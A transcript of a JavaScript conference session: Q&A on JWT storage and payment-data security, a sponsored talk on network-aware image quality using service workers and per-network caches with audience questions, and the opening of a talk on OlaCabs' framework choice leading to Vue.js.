So my question is again about JWT. The way I used to do it was: I used to send the JWT after the user logged in, and then I would store it in local storage. Today I got to know that that's not a good idea. So how do you take care of the flicker which happens the first time? And when I want the session to stay, even if the user closes the tab and reopens the website or the application, so that the APIs still work, how do you ensure that if I keep expiring the token again and again and again?
So every time you expire the token, you also recreate a new one.

Yeah, I get that. But say I expire it, then I close the tab and reopen the tab, and there's a flicker. How do you prevent that? I have faced it. Maybe it's a simple solution, I don't know.

Okay, so your use case is basically that you want the token to be valid for longer; you don't want it to expire every five seconds. Yeah, but if I do not store it in local storage or a cookie, then how do I check, you know, the first API call after the user opens the tab? There's one first API call with the token, right?

Oh, sure. So there are a bunch of libraries that do that for you. Auth0.js, for example, does that: it literally uses local storage to keep a key, essentially saying this is the user for your service, like Auth0, and then using that key it gets a new token for you. So either you have to ask the end user to input his credentials again and again, or you have to store something locally, in something like local storage or a cookie, that you can use as a proxy for that. It's like saying you're avoiding man-in-the-middle attacks by continually deleting the token, but you're still vulnerable to things on the client, a Chrome extension or something. Right. Okay. Thanks.

I'd also add one thing: you either design your system with a refreshing mechanism in mind or you design it without one. If your system has a refreshing mechanism, it should not matter whether you refresh every five seconds or every five days; the refresh should work either way, including refresh after expiry. Or you completely don't have refresh, and then people just log in every time. There's not going to be any middle ground where some refreshes work and some don't.

Hello. My question is: how do we secure interactions like sending sensitive data? For example, credit card details. JWT we understand: we said we don't use it for transmitting secure information. But when we are in a situation wherein we have to send a user's credit card details, with the CVV and everything, if anyone captures that, the user will completely lose trust in the company and the site. So that is my question: any suggestions on how to make that secure? Thank you.

So when it comes to critical data, and payments is definitely one of them, there are a few things. One: HTTPS, well tested, not prone to man-in-the-middle as such. Then you have a secondary level: on the server side you have PCI restrictions on what data can be stored, validated, logged, so on and so forth. There are also additional things that you do, especially if you use a payment gateway or things like that. You'll see that they ask you to encrypt the data with a public key on the client side and send a request token, which they can validate to make sure that the request itself was not intercepted or tampered with. Those kinds of cryptographic hashes and signatures, using public keys on the client and private keys on the server to validate, make a lot more sense, and that's really your best option for that.
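To tie the JWT discussion together, here is a minimal sketch of the sign-and-verify flow using the jsonwebtoken npm package; the key variables are placeholders and the claims are illustrative:

```javascript
const jwt = require('jsonwebtoken');

// On the authorization server: the private key signs the token.
// Only the token leaves the server; the key itself is never in transit.
const token = jwt.sign(
  { sub: 'user-123', role: 'user' },       // nominal identifying claims only
  privateKey,                               // placeholder: an RSA private key (PEM)
  { algorithm: 'RS256', expiresIn: '15m' }
);

// On the API server: verification proves the claims weren't tampered with.
// Note the claims are readable by anyone holding the token; they are
// verified, not hidden, so never put secrets in them.
const claims = jwt.verify(token, publicKey, { algorithms: ['RS256'] });
```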
Anybody using Cloudflare to provide SSL for their website, or any other DNS provider to provide proxy-based SSL? Yeah. So your actual backend is running on HTTP and Cloudflare is providing the HTTPS part. Anybody with a setup like that? Well, then a man in the middle is already happening right there. I'll give you an example. There was once a takedown request; I know of it through a friend, and I don't want to name the company. They had a takedown request for a particular URL. The government actually does issue takedown requests for particular URLs, but ISPs cannot comply, because if it's HTTPS you don't know the part of the URL after the domain. So ISPs cannot take down a page; they can only take down a whole website, and they usually refuse to do that if the request is only for a particular URL. Then the government found out that the actual server was running on HTTP in an Airtel data center, so they just requested Airtel to block it from behind the Cloudflare part. So, if you're using SSL, it should be your SSL certificate, not the Cloudflare kind of setup; otherwise somebody can just reach your data center directly and meet you in the middle there.

Okay, we'll cut the questions here, but don't worry, you can come to the speakers and talk to them personally. Wow, nice. So we've had three security talks; now we shift the focus a little from security to other parts of JS. How many of you have tried, or have managed, to install or implement service workers in production? Okay, this is nice. A friend of mine had the worst experience: he set up a service worker and could not update the site, so he had to buy a new domain in order to get around the service worker. You end up buying another domain just so that the update works. So our next talk is by Rahul, who aspires to be a DJ and play at Tomorrowland one day. So maybe if we do something like this, he'll be able to relate to it. So Rahul, the stage is yours.

This is working, right? Yeah. So hello everyone. We are on time, so I guess we're on time for lunch as well; I'll try to wrap up so that you're not late for that. I am Rahul, co-founder at imagekit.io. It's a relatively new product, and I'm sure not a lot of you have heard about it, but what we basically do is real-time image optimization and transformation. Today I'm going to talk about something a lot of people have come up to us and asked: how do we optimize images based on the user's network? Let's say the user is on 3G, or on 2G; how do we change the image we are sending them? Consider the typical case where an e-commerce website loads hundreds of images; they would want to opt for some kind of optimization for users on a slower network. So that is what we're going to discuss: how do you optimize images on the basis of the network the user is on? And yes, I am from ImageKit and I will be using ImageKit, because this is a sponsored talk, as you would have read in your schedule. But what we discuss you can implement on your own as well: you can use any in-house solution you might have for images, or any other third party, and not just for images. You can in fact apply what we discuss to other, more critical parts of the application, like the JavaScript and the CSS.
You can optimize those as well on the basis of the network. So let's get started. This is a rather interesting start, and I guess most of you who have worked on the front end are aware of this: all the new users coming onto the internet are coming through mobile. Globally that's 55% of all users; in India it's a higher percentage, at 78%, mainly because of cheaper handsets and cheaper data plans coming in with Jio and Airtel. And why am I talking about mobile when I'm talking about service workers? Because network speed is actually a problem on mobile devices. You work in your offices and you have a very stable Wi-Fi or LAN connection; you do not have network problems there. The network problem is on your mobile devices. For example, if you step outside your building, move into the lift lobby or, let's say, into the basement parking, your network speed drops. So our ideal target audience for this is people using mobile, and that's a big chunk for all websites. And we often believe that with Jio and Airtel and everyone coming in, our users have a great 4G speed or a great 4G network, but that's actually not the case. We did a study with one of the companies we work with, 91mobiles.com. Chrome exposes the estimated downlink speed that the user is observing at that time, and we tried to measure that. We did it for over a million users, and this is what we see: almost 45% of the users have a speed lower than two megabits per second, and in fact almost 25% of users have a speed of less than one megabit per second. So we assume that our users have a really fast network, but the reality is that they do not. And contrary to this, in the last six years our page sizes have gone up by three times. The reason is that we started pushing a lot more JavaScript code with client-side rendering, we started pushing a lot more to the client, and videos have gone up in the last year as well. So our page sizes have increased, our assumption that the network has improved stays, but the reality is that the networks have not improved as much, and the result is that our users end up with a frustrating experience. They might not even come back to the website. I'll go back to the previous slide; I just want to focus on the green bar at the bottom, which corresponds to images, and I'd like you to notice that images still account for about 50% of the page weight. Videos are coming up, but images are still the major component of the page. So this makes it very clear: up until now we have been able to modify our websites and our content on the basis of, let's say, the user's DPR or the user's device width, we have made responsive websites, but not a lot of us have worked on optimizing the website on the basis of the network speed, and that must change. We need to stop building for ourselves. We need to stop building for people who are on a Wi-Fi connection and can load our website really fast; we need to start thinking of users who are not on a very good, stable connection, and we need to start building for them. And our target in this talk is images.
The reason being that, as we observed, they still form more than 50% of the page weight. Plus, images are the lowest-hanging fruit, to be honest. They might not have as much impact on the overall page load time as optimizing JS or CSS would, but they are the easiest to optimize and the easiest to start off with, and you can apply this concept to any other content on your page as well. So now we have two requirements. One: we need to determine what network the user is on and detect when that network changes. Two: when the network changes, we need to change the image size we are sending them. Let's look at the first part: how do we detect network changes? Chrome and Chrome mobile, from what I last read, have implemented the Network Information API. What this does is observe all the downloads happening in the browser and try to estimate what kind of network the user is on. It exposes a read-only value, which can be read from navigator.connection.effectiveType, and it basically classifies the user into four buckets: 4g, 3g, 2g or slow-2g (a short sketch of reading it follows below). When I say 4g, it's basically speeds upwards of 3 Mbps, and that includes Wi-Fi as well; so even though the classification is 4g, it covers really good speeds, including Wi-Fi. So we do know what network the user is on and what kind of speeds they're getting. 4g obviously is faster than 3g, 3g is faster than 2g, and 2g is faster than slow-2g. So logic dictates that on 4g, the fastest network of all, we serve the largest image size, and on slow-2g, the slowest of them all, we serve the smallest image size. That's what we want to do. Now, how do we change the image size? We're not talking about changing the image dimensions; we're not saying we will resize the image and send a smaller image to a slow-2g user. What we want to do is compress the exact same image further. For those of you who have worked with images on the front end, you will know there is a factor called image quality associated with an image. Very simply put, image quality is a scale of 1 to 100, 100 being the best quality and 1 being the lowest; 100 is the sharpest and best image you can get. I've taken this image as an example. Let's say I have the image quality set at 90, which is a standard for a lot of websites; the size is 47 KB. Let's assume we use this for the 4g network. Next, let's say for the 3g network we use quality 70, which gives us a 40% reduction in size. Now assume you have a website which loads one MB of images: if you are able to save 400 KB out of it, you have saved a lot for the user on 3g. Similarly, for 2g we use a smaller quality level, 55, and for slow-2g we use 40, at which point we are reducing the size of images by almost 72%. That's a huge reduction for the user: a lot less data to download. So how do you change quality? This is where ImageKit comes in: we provide a lot of transformations that you can do in real time on an image.
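As a sketch of the detection side, assuming a browser that implements the API (the fallback value here is a design choice, not part of the spec):

```javascript
// Read the current effective network type, defaulting to '4g'
// where the Network Information API isn't available.
function effectiveNetworkType() {
  const connection = navigator.connection;
  return (connection && connection.effectiveType) || '4g'; // 'slow-2g' | '2g' | '3g' | '4g'
}

// React when the browser's estimate changes (e.g. walking into the basement parking).
if (navigator.connection) {
  navigator.connection.addEventListener('change', () => {
    console.log('network changed to', effectiveNetworkType());
  });
}
```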
So, as an example of those transformations, let's say I have this image URL, image31.jpeg, and let's say I want a quality 90 image. All that I'm doing here is appending a query parameter, tr=q-90, and it gets me a quality 90 image. If I change that to 60, it gives me a quality 60 image. If I change that to 10, it gives me a q-10 image, and I'm not sure if you can see it on the screen or not, but the q-10 image is actually really low in quality. If you notice the clouds above the house in particular, you will find they are really pixelated, and that is why the size is small. Apart from quality, ImageKit does a lot of other transformations, but for now I'll stick to quality; that is what we are trying to optimize. So we have figured out two parts: we know what network the user is on, and we have a way to change the quality in real time. You can use anything apart from ImageKit if it can do that; I'm just using ImageKit as an example. Now, how do we handle all of this in our code? The idea is that we do not want to keep changing our code; we cannot have our server sending different URLs for different network speeds. We do not want those kinds of changes. This is where the service worker comes in. I guess a lot of you have worked with service workers: the service worker sits as an intermediate proxy between the user's browser, the cache storage in the browser, and the network, and what it allows us to do is intercept every request and then decide where we get the response from. Do we get it from storage? Do we get it from the network? Do we modify the URL? And that modify-the-URL part is what we are looking at. So what we will do is this: let's say I have image1.jpeg in my HTML. If I detect 4G in my service worker, I change the URL to use quality 90; if I find 3G, I change it to use quality 70; on 2G we use 55, and on slow 2G, 40. This is what we will use the service worker for: intercepting the request and changing the URL from which we get the response. So let's look at some code. My image tag remains exactly the same; I'm not changing the image tag, and my quality parameter does not appear in the image tag. Next, obviously, we install a service worker. I won't go into the depths of it; it's a pretty standard thing, you just call serviceWorker.register with the file name and it gets registered. Now, this is the main function. The service worker allows us to hook onto an event called the fetch event, which is fired for every request originating from your browser. What we do in the first two lines is a very basic check: is this a JPEG image, or a PNG, or a GIF, or a WebP? If it is, we continue. We check the connection type, and for that connection type we determine what quality to use; in lines 11 to 13 we create the new URL, with the quality parameter appended, and in lines 14 to 17, instead of responding with the same URL, we respond with the modified URL. So for example, if the browser sent a request for image1.jpeg and we modified it to use, let's say, q-70, we respond with the q-70 version; we do not respond with the original URL.
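Here is a rough reconstruction of that fetch handler. It is not the exact slide code, so the line numbers mentioned above won't line up, but the quality mapping follows the talk:

```javascript
// sw.js — rewrite image requests to a network-appropriate quality.
const QUALITY_FOR_TYPE = { '4g': 90, '3g': 70, '2g': 55, 'slow-2g': 40 };

self.addEventListener('fetch', (event) => {
  const url = new URL(event.request.url);

  // Only touch image requests.
  if (!/\.(jpe?g|png|gif|webp)$/i.test(url.pathname)) return;

  // navigator.connection is exposed to workers in Chrome.
  const type = (self.navigator.connection || {}).effectiveType || '4g';
  url.searchParams.set('tr', 'q-' + (QUALITY_FOR_TYPE[type] || 90));

  // Respond from the rewritten URL instead of the original one.
  event.respondWith(fetch(url.href));
});
```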
So let's look at an example of how this works. This is a basic site we have created, similar to an e-commerce website. I've already loaded it, but that was without the service worker coming into the picture. What I've done is throttle the network to fast 3G, which is something you can do in Chrome, and I will just reload the page once and hope that the demo works. It does. I have also overlaid the quality number at which each image was fetched, so if you see, all images have been fetched at quality 70; all of them have this number 70 overlaid in the top-left corner. And if you look at the network tab, this is the original request, the one the browser fired, resizing to 300 by 450. The service worker intercepts it and issues a new request which has q-70 as one of the parameters, because the service worker detected that the user is actually on a 3G network. So this is what the service worker was able to accomplish, and it's very good to begin with: we were able to detect the network, modify the image, and send a lighter image to the user. But there is a problem with this, and the problem is that the browser does not know that you have modified the URL in the service worker. For the browser, it's a black box: if the browser requested image1.jpeg and you responded with, let's say, the quality 40 image, the browser does not know, and it would cache that low-quality response forever, or for as long as the cache-control headers allow. We do not want this to happen. Since we are varying the response on the basis of the network, we do not want the browser to behave as a black box and cache everything we give it. So one thing we need to do is skip the browser cache completely. Instead, we will use the Cache Storage API, which is there in all modern browsers, I guess in most of them, and use it to create caches for different network types: a different cache for 4G, and separate caches for 3G, 2G and slow 2G. And we will implement a waterfall kind of lookup, wherein we always look for the best resource. We know that the 4G cache has the best images, the quality 90 ones, so we always prefer looking for an image in the 4G image cache; then we go to 3G, then to 2G and slow 2G. This is how we structure our cache lookups, and it's something you cannot attain with the browser cache; that is why we need to skip it completely. So let's look at the code. If you remember the previous code example, we were responding with the transformed URL. Instead of that, we now have a new function: a step-down cache lookup. We do the cache lookup, and if it fails, we go to the network. This is the cache lookup code; I'll simplify it for you, and I've shared the code on GitHub as well, I'll share the link where you can read it. Lines 9 and 10 basically look for an object in the cache, let's say the 4G cache. If we find it in the 4G cache, well and good, we return it from there; if not, we go to the next cache, which is 3G.
If we find it there, we return it from the 3G cache. If, let's say, we do not find it in the 3G cache, we look in the 2G cache, and let's say the user is on 2G right now. If the object is not in the 2G cache either, then we go to the network, which is lines 16 and 17. If we get a successful response, we add it to the corresponding network cache, which is done in line 18. So now we have four different caches, we add objects to different caches on the basis of the network, and we also pick up the best object we have available at the time: if we have the 4G version available, we use the 4G object (a sketch of this step-down lookup follows below). So let's see how this actually works out in a demo. Let me just check that I have cleared all caches. I'll start with slow 3G; this should get me a quality 50 image, ideally, because everything's slow. You can see the first image that loaded is quality 50. I'll update this to fast 3G and reload the page. Now, because the network has improved, the browser automatically fetched the better variant of the image: the quality 70 one. Let's say I remove the throttling completely and reload the page again. It takes a moment for the connection type to update; like I mentioned earlier, the Network Information API looks at the download times the user has been observing, and because I was observing 3G-like download times, it kept me in the 3G bucket slightly longer. Now that I have moved to 4G, we get the quality 90 image. Now let's do the reverse: the network downgrades again, and the user falls back to slow 3G. What happens? We still have the best image in cache, and it should ideally just pick that up. It picks up the quality 90 image, and if I look at the cache storage (is this visible to everyone at the back?), we have four different cache storages here. We have a 4G network cache with all the images cached on 4G, we have a 2G cache, we have a slow-2G cache, which we never accessed, so it is empty, and we have images in the 3G cache as well. But 4G is the preferred one, so our images will always be picked up from there. So basically we have implemented a scheme where, as soon as the user's network speed upgrades, the images upgrade as well, but if the user's speed goes down, we look for the best image we can serve and don't downgrade the experience. Now, this presents another problem: cache management. Earlier the browser was managing the cache for us; now we are adding objects to the cache, so we also need to ensure we are clearing objects from it. For this I've used Google Workbox; you can figure out any other way to do it. What Workbox allows is setting up rules on every cache, either on the basis of the number of objects in the cache or on time. For example, objects in the 4G cache remain there for, let's say, 30 days, and I can have a maximum of 1000 objects. I can set up this rule by creating what is called an expiration manager. This is how an expiration manager is defined using Workbox: we specify the max age in seconds.
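A simplified sketch of that step-down lookup; the real code is in the GitHub repo mentioned in the talk, and the cache names and order here merely mirror the description:

```javascript
// Look for the best cached variant first, then fall back to the network.
const CACHES_BEST_FIRST = ['4g', '3g', '2g', 'slow-2g'];

async function stepDownLookup(request, currentType) {
  // 1. Prefer higher-quality variants cached under faster network types.
  for (const type of CACHES_BEST_FIRST) {
    const cache = await caches.open('images-' + type);
    const hit = await cache.match(request.url);
    if (hit) return hit;
    if (type === currentType) break; // past the current network's cache, go fetch
  }

  // 2. Nothing usable cached: fetch, then file the response under the
  //    current network type's cache for future lookups.
  const response = await fetch(request.url);
  if (response.ok) {
    const cache = await caches.open('images-' + currentType);
    await cache.put(request.url, response.clone());
  }
  return response;
}
```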
We specify the maximum number of cache entries, and in addition to adding the object to the cache, we also update the timestamp of when the object was added, which is done on line 6, so that the expiration manager can see how long each object has been in the cache, and from time to time we expire the entries. You can do a very simple setInterval kind of thing: every 60 seconds, you clear out all the objects that should no longer be there. That's a very simple way of managing what stays in the cache. So, to summarize: one thing is very clear. For a long time we have been optimizing for different devices and different screen sizes; it's time we start optimizing for different network speeds as well, because, to be honest, network speeds are not that great in India, and we must stop assuming everyone accesses our websites the way we do from our offices or over our Wi-Fi, where everything works blazing fast. That's not the case for our users, so we need to start thinking about them and optimizing for network speed. We talked about images, but you get the gist: you can extend the same concept to JS and CSS. You can basically tell your server, okay, the user is on a 3G network, send me a lighter version of the website. So this can be extended beyond images as well. We needed two parts to the problem. One is to detect network changes and maintain different caches for every network; for this we have the Network Information API, service workers and the Cache Storage API. The other part, modifying images in real time, is what we do at ImageKit. Apart from quality we have real-time resizing, cropping, transformations, face-detection overlays, et cetera. It comes integrated with a CDN, so the performance stays right up there, and you can integrate it with your own infrastructure as well. We can talk about ImageKit later, but as I said, you can do this even without ImageKit: with your own in-house image management solution, if it can modify quality in real time, or with any other third-party image product. The demo page which I showed is there at the link on the slide, and the code is on GitHub under the ImageKit org. It's very basic code; I haven't had time to add the readme file, I'll do it soon after the talk. You can contact me via email or follow me on Twitter if you have any questions. That's it, thank you.

So my question is in general, and also in the context of ImageKit as a service: say I'm on a slow network and I have images which have been loaded in poor quality, but as a developer I want my user's images to be upgraded. What I'm talking about is progressive enhancement. Is ImageKit giving me something, or in general, is there a solution for this?

So what we discussed was a very general solution. If I see that the network has upgraded, that, let's say, the user was earlier on a 2G network and you loaded a low-quality image, but then the network upgraded to 4G, the service worker automatically fires a new request, so the images automatically get updated. Beyond that, it depends on your application logic and what you want to configure. I configured it to upgrade instantly, but let's say you do not want that to happen.
Let's say you want to wait, say, five minutes after the user is on a better network before making a new request. You can implement that in the service worker. It's a very generic thing; it's not related to ImageKit. Like I said, it's something you can change in the service worker itself: do you want to upgrade to a better image instantly, do you want to wait for some time, or do you want to upgrade based on some other logic? That's all decided in the service worker.

Hi Rahul. Yeah, we are right here, can you see me? Okay. Yeah, hi Rahul, my name is Shashank. Your talk was quite informative. I am working on a couple of products in which I have to support users on IE 6, 7 and 8.

Good luck with that, sir; that's all I can say. I mean, in the best-case scenario, if we go back to the code, the image tag basically doesn't change, and if the browser does not support service workers, the same experience still gets delivered to your users. So in any case the experience is not hampered. The only thing is that if the browser does support service workers, then we do something additional. Otherwise the experience on IE, et cetera, remains the same: the image tag loads as-is.

Are there any alternatives? Because I've seen a couple of GitHub projects with alternatives, but the options are a lot.

I cannot hear, actually. How about now? Is it clear? Not yet. Can you hear me now? Yeah. Okay. So, on GitHub there are a lot of repositories which have solutions for this, but there are a lot of products out there, so I'm finding it difficult to choose the right one. A lot of products for network-based optimization or image optimization, or replacements for service workers on IE 8 and 7.

You mean something like a polyfill for service workers? Yes, that's right. So I haven't explored that, to be honest. I haven't come across these polyfills, so I cannot comment on them. But if there are some, maybe I'll look into them and update my presentation and talk as well. Thank you.

Hey, hi. So Chrome provides this API to detect the network, like 2G or 3G. What about Firefox, Safari and mobile applications?

As of now, the Network Information API is available only in Chrome and Chrome mobile, which is basically almost 70% of the users accessing typical websites. But I recently came across an implementation done in service workers: what the Network Information API does is calculate the effective downlink from the download speeds the user is observing, and a service worker can do the same thing. So support for network information kind of gets extended to other browsers which support service workers, which is a slightly wider range of browsers than just Chrome and Chrome mobile. But beyond that, like I said, it's progressive enhancement: if the browser does not support, let's say, network information or service workers, the experience still remains the same, and if it does, we do something better with it.

This is a basic, elementary question: can the same approach be extended to switch the format of the image? If I'm using Chrome and my browser supports WebP, can I intercept a PNG image and instead serve a WebP?
Right. In ImageKit we actually do that automatically, which is why I didn't cover it: when we see that a browser or device supports WebP, we switch to it without even changing the URL. But yes, it can be extended. If you can detect that the browser supports WebP, through content negotiation and such, you can modify the URL to fetch a WebP image as well. And there are no restrictions when the resulting MIME type differs from what the URL suggests: you'll have seen cases where the URL ends with .php but the response's Content-Type is image/jpeg. That works perfectly fine, because the browser looks at the Content-Type header, and in fact at the actual content being sent back, and determines on its own how to display it; it doesn't matter what extension the original URL has. For WebP you actually don't even need a service worker. There's a much simpler way to implement it, which I can talk about after this session, since it's not related to this topic. Thank you.

"Hi, I have a question. Can I use ImageKit if my image is not uploaded on your domain?" Yes, you can integrate it with your own storage or your own image server, anything. We'll fetch the image from there, do everything in real time, and send it back. "Okay, thank you."

"Hi, I have a question. You said the network type returns a string like 4G, 3G or 2G. What happens if 4G is returned but the actual downlink speed is low?" There were two observations I had when I was working on this. Yes, there are cases where the actual downlink speed is low and the browser still reports 4G. If you look at the code we've uploaded to GitHub, we take that into account: if the speed is less than one megabit per second, we don't use the effective type returned by the browser; we set it to 3G ourselves. That is one way of doing it, looking at the downlink speed instead of the reported effective type. But I've also read that the mapping from downlink speeds to effective types varies from browser to browser and can change in future releases: as network speeds improve, browsers will update their tagging, so what is tagged 3G today may not be tagged 3G two years down the line. So either you rely on how the browser tags it, or, in exceptional cases like ours, you override it when the downlink speed is really low. It's a call you need to take: go with the downlink speed, or go with what the browser tells you the effective type is.

"Can you quickly run us through how ImageKit would integrate with my infrastructure?"
"Because I think in most use cases I would serve the images from my own infrastructure, right?" Yeah. "Okay, thanks, that's it."

"Does ImageKit work only for images, or for 3D models as well?" It works for more than images, but that's beyond the scope of this presentation, so maybe we can catch up outside and talk about it. "Okay, yeah."

"Since it improves network performance by compressing the image: we parse data out of images and show business data from them, and when you compress the images or models, data is lost, right?" Yes, but that's a trade-off you decide on based on your application. Showing a slightly lower-quality image, say 30 to 40 percent smaller, with an option for the user to fetch the original, is still much better than not loading the image at all. Imagine an e-commerce website where the image does not load at all, versus one where you at least show a lower-quality variant from which the user still gets the idea: okay, this is a black t-shirt I'm looking at. You obviously lose some detail, that's part of it, but the user gets a fair idea of the object, and that turns out to be favorable for a lot of use cases. Then again, it depends on your application; you may not want to go for it at all. "For us, we parse the data out of 2D and 3D models and show the business data to the end user, so if you compress the data before sending it, it won't be that useful for our end users." Maybe. That depends on your application, like I said; this is very effective for a lot of use cases, but perhaps not in yours. "Okay, thank you."

"Hi. How is lazy loading of images different, and should it be used in combination with image optimization?" Lazy loading means you don't load something that isn't visible on the screen, but when an image does become visible, you still load the highest-quality variant: you don't take into account that the user is on, say, a 2G network. That's the difference versus network-based optimization. Lazy loading is loading the first 10 images and leaving the other 90 out; network-based optimization is that when you load those 10 images, you account for the user being on a 2G network and load a lighter variant instead of the best-quality one. They're different concepts, and they combine well, as the sketch below shows.
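A minimal sketch of combining the two ideas, IntersectionObserver-based lazy loading with a network-aware quality choice; the `data-src` convention, the quality map, and the `tr=q-` parameter here are illustrative, not from the talk's repo:

```js
// lazy-load images, picking a quality by network when they enter the viewport
function pickQuality() {
  const conn = navigator.connection;
  if (!conn || !conn.effectiveType) return 90;           // no API: assume a fast network
  return { 'slow-2g': 30, '2g': 40, '3g': 60, '4g': 90 }[conn.effectiveType] || 90;
}

const io = new IntersectionObserver(entries => {
  for (const entry of entries) {
    if (!entry.isIntersecting) continue;
    const img = entry.target;
    // data-src holds the base URL; append an illustrative quality parameter
    img.src = img.dataset.src + '?tr=q-' + pickQuality();
    io.unobserve(img);                                   // load each image only once
  }
});

document.querySelectorAll('img[data-src]').forEach(img => io.observe(img));
```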
"My question is along the lines of her question. Say, for example, I have lazy loading for images: I create a hook so that after 50 to 80 percent of the scroll, the next 10 images load. If the speed is too low, can I have the service worker change the quality? And how much time does it take for the browser to understand that the network has changed?" There is basically no lag in what the browser tells you the network type is; it's instantaneous. When you saw the refresh being slow earlier, that was because the page was still being fetched from the server: the page load is still slow, the JavaScript being loaded is still slow, only the images have changed. That's why I said images are the easiest bit; the real performance gain comes when you implement this for your pages and your JS and CSS, because that's where the performance bottlenecks usually are. As for whether the service worker adds a delay while modifying the request: honestly, I haven't seen any significant delay. It's probably a couple of milliseconds extra while the service worker rewrites the URL, and it doesn't really matter. A user on a 2G network would otherwise load an image in four or five seconds; if serving a lighter variant gets that down to three seconds, it more than compensates for the extra time spent in the service worker.

"One more question. If you're implementing this service worker for image optimization: you've seen how Medium does it, right? They first send a blurry image, very small in size, so the user gets the idea that it's loading. Would you choose that over this?" So, something similar to what we see on medium.com. It's again a call you make based on your business. A really blurred-out image is the smallest thing you can serve, but whether it suits your business is up to you. For a content company it may be fine: if you're loading the photo of an actor in an article, it's fine if it shows up blurred initially. That might not be true for an e-commerce image where you're loading, say, a t-shirt; there you still want to show the actual object in somewhat more detail rather than a blurred image. Again, it depends on your business logic and what you want to achieve. A sketch of that blur-up pattern follows.
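For reference, the Medium-style blur-up pattern discussed above might be sketched like this; the class name, the `data-full` attribute, and the tiny-placeholder convention are all illustrative:

```js
// load a tiny blurred placeholder first, then swap in the full image
// assumes CSS along the lines of: img.lqip { filter: blur(12px); }
document.querySelectorAll('img[data-full]').forEach(img => {
  // img.src initially points at a very small (e.g. 20px-wide) variant,
  // scaled up and blurred by the CSS above
  const full = new Image();
  full.src = img.dataset.full;          // start fetching the full-quality variant
  full.onload = () => {
    img.src = full.src;                 // swap once it has arrived
    img.classList.remove('lqip');       // remove the blur
  };
});
```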
Okay, let's cut the questions here; the speaker will be outside, so you can discuss live. We have a lunch break; let's meet at 2:10. Thanks. Also, if anyone wants to make flash-talk submissions, please do: they're still open, and only two slots are left.

All volunteers, please come to the front; we have some work to do. Okay, everyone had a good lunch? Is anyone sleepy, or going to be sleepy? We're raising our hands confidently. Okay, just before we start, a few announcements. The Angular BOF session is being held outside, and there's a workshop on Alexa in Audi 3, next door. A quick word on what a BOF session is: it's mainly a discussion; you have a couple of panel members, and you can put forward your questions in an open discussion. In addition, for the flash talks we already have five speakers, and there's probably one more slot left. If you submitted for the flash talks, please be seated in this area, because we'll run the flash talks right after this; it just makes it easier to coordinate everything.

Okay, so the next talk is on the most starred front-end library on GitHub. What is that? Okay, good, that's nice; I'm a bit one-sided towards React myself. We actually have some Vue core contributors here in the audience; he also has a workshop tomorrow, Rahul is sitting there. So if you want to learn about Vue, or are trying it for the first time, you can talk to him. Our next talk is by a speaker who is in the top 10 in India at PUBG, which is an achievement, I guess. He's also an ex-Flipkart guy, and he's here to share his experience with Vue. Ashret.

Hey everyone, I am Ashret. I work at OlaCabs as a tech lead in the Consumer Web division, and today I'm going to speak about how we use Vue.js at OlaCabs. Before I begin the actual content of the talk, I want to set some context. Last year I gave a talk at JSFoo about how we built a PWA for OlaCabs, and during that talk I covered how we chose our framework, what the benefits were, and what the journey was; you can check it out on YouTube. I mention this because this talk is a continuation of that one, so I'll recap the key point from last time: which framework did we choose, and how?

First we considered Angular 1. At that point Angular 1 was a good framework, but it had problems rendering large lists, and it had the digest-loop problem. We had good in-house expertise in Angular, which is why we considered it first, but because of those problems we decided to look at something else. The next choice was React: a very good framework, with unidirectional data flow and a virtual DOM, so render performance was really good. But at the same time Angular 2 came out. Angular 2 had incorporated unidirectional data flow but retained two-way data binding, or as you'd call it today, reactive programming, within its components. That was the best of both worlds for us, so we built a POC of the Ola PWA with it and ran performance tests. What we found was that it was a good framework, but very heavy: around 30 KB of polyfills and 198 KB of Angular 2 library code, and the sample application we had written was around 50 KB on top of that.
That was a very large payload, considering we wanted to deliver this application on mobile. Of course, AOT and tree shaking could reduce the size, but the abstractions in Angular 2 still made render performance difficult, so we were looking for something lighter. That's when we looked at Vue.js and Polymer. Between Vue.js and Polymer the competition was very tight: they had very similar performance characteristics, and it really boiled down to how we wrote code in the framework rather than the framework itself being a bottleneck. We went ahead with Polymer. The rationale was our historic traffic pattern: we didn't have to worry about old browsers, and for Ola the PWA was meant to be an experimental, futuristic, acquisition-only channel, which again meant old-browser support mattered less. With this we built a very good PWA, and it was showcased at Google I/O as well as at last year's JSFoo.

Let's pause the recap there and look at what happened next. Ola as a company found that the web is a reliable platform: it performs very well, and the time required to ship an application to production is significantly less than on Android or iOS. That's where the mandate for web came from. We wanted to replicate the capabilities and best practices we had found while building the Ola PWA across all projects in the organization. So we looked at the state of our web stack at Ola, and it was fragmented: different teams were using different frameworks, and even within a single team, different projects used different frameworks. We felt we needed a common framework, as an effort to streamline and standardize web development across our consumer vertical, our supply vertical, and all our internal websites. We also wanted the same framework across desktop, mobile and in-app web views, and to give our developers a way to develop, test and deploy applications at scale, without going through a choose-a-framework cycle every time they start an application.

With this in mind, what could we do? We could write our own framework, or write vanilla JavaScript and enhance it, but all of that is a large cost to the organization. Instead we thought: there are a lot of good frameworks out there, so why not leverage them rather than reinvent the wheel, and just tweak them to our needs? One of the main things we had learned is that web components are a very good architecture for delivering web applications. Next came inter-component communication: from our experience, unidirectional data flow, parent-to-child props and child-to-parent events, with a store for business data, is a very scalable architecture. Next, data-driven reactive coding within the component; we didn't want to lose that. Mobile web performance should also come out of the box: an individual developer should not have to worry about how to deliver a performant web application. And we wanted to keep the lazy registration of components that Polymer offered.
With this, the developer should be able to just code and run, but at the same time make conscious decisions about page-load performance: he should not be sending down JavaScript that isn't necessary for the critical rendering path, so he has to choose how files are loaded. That choice stays with the developers. Next, we also had buy-in from the design team. We told them we were going to have a central framework and wanted to reuse libraries across multiple projects, and we asked for their support so that the designs they produce let us leverage work from previous projects. There were other, smaller requirements: we wanted to use HTTP/2, and we had infrastructure support for it; Ola supports local languages and is going international, so we wanted that support as well; and if we wanted to build a PWA, the same tooling should support that too. We also wanted integration with our build infrastructure, so that a developer doesn't have to worry about getting to staging or production, debugging, setting up logs, or scaling the number of servers up and down. All of these pieces were part of the plan, though they don't pertain to Vue as such; they're general and framework-agnostic. There was one more requirement: since we were writing a unified framework, it had to be compatible with web views below Android 5, because our traffic pattern showed a significant number of users coming in on those.

